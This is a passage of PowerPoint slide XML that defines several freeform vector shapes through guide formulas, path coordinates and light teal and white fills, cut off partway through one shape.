              <a:gd name="T27" fmla="*/ 0 h 84"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T32" fmla="*/ 0 w 22"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T34" fmla="*/ 0 w 22"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T36" fmla="*/ 0 w 22"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T38" fmla="*/ 0 w 22"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 84"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 22"/>
              <a:gd name="T69" fmla="*/ 2147483647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
              <a:gd name="T106" fmla="*/ 0 h 84"/>
              <a:gd name="T107" fmla="*/ 22 w 22"/>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 h="84">
                <a:moveTo>
                  <a:pt x="22" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="77"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A8D8D8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10271" name="Freeform 352"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="7493000"/>
            <a:ext cx="38100" cy="146050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T11" fmla="*/ 0 h 65"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T16" fmla="*/ 0 w 17"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T18" fmla="*/ 0 w 17"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T20" fmla="*/ 0 w 17"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 65"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 17"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 6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65"/>
              <a:gd name="T59" fmla="*/ 17 w 17"/>
              <a:gd name="T60" fmla="*/ 65 h 6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65">
                <a:moveTo>
                  <a:pt x="17" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BCE5E5"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10272" name="Freeform 353"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1423987" y="7494588"/>
            <a:ext cx="31750" cy="106362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 0 h 47"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T11" fmla="*/ 0 h 47"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T16" fmla="*/ 0 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T18" fmla="*/ 0 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 47"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 2147483647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47"/>
              <a:gd name="T59" fmla="*/ 14 w 14"/>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47">
                <a:moveTo>
                  <a:pt x="14" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D1F2F2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10273" name="Freeform 354"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1425575" y="7497763"/>
            <a:ext cx="20637" cy="60325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T9" fmla="*/ 0 h 27"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T11" fmla="*/ 0 h 27"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T13" fmla="*/ 0 h 27"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T16" fmla="*/ 0 w 9"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T18" fmla="*/ 0 w 9"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T20" fmla="*/ 0 w 9"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T37" fmla="*/ 2147483647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27"/>
              <a:gd name="T59" fmla="*/ 9 w 9"/>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27">
                <a:moveTo>
                  <a:pt x="9" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5FFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10274" name="Freeform 355"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="7670800"/>
            <a:ext cx="31750" cy="30163"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 0 h 13"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 0 h 13"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 0 h 13"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 0 h 13"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 0 h 13"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 0 h 13"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T39" fmla="*/ 0 h 13"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T46" fmla="*/ 0 w 14"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T48" fmla="*/ 0 w 14"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T50" fmla="*/ 0 w 14"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 13"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 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
              <a:gd name="T100" fmla="*/ 0 h 13"/>
              <a:gd name="T101" fmla="*/ 14 w 14"/>
              <a:gd name="T102" fmla="*/ 13 h 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 h="13">
                <a:moveTo>
                  <a:pt x="7" y="13"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10275" name="Freeform 356"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1584325" y="7670800"/>
            <a:ext cx="15875" cy="15875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T15" fmla="*/ 0 h 7"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T17" fmla="*/ 0 h 7"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T19" fmla="*/ 0 h 7"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T22" fmla="*/ 0 w 7"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T24" fmla="*/ 0 w 7"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T26" fmla="*/ 0 w 7"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 7"/>
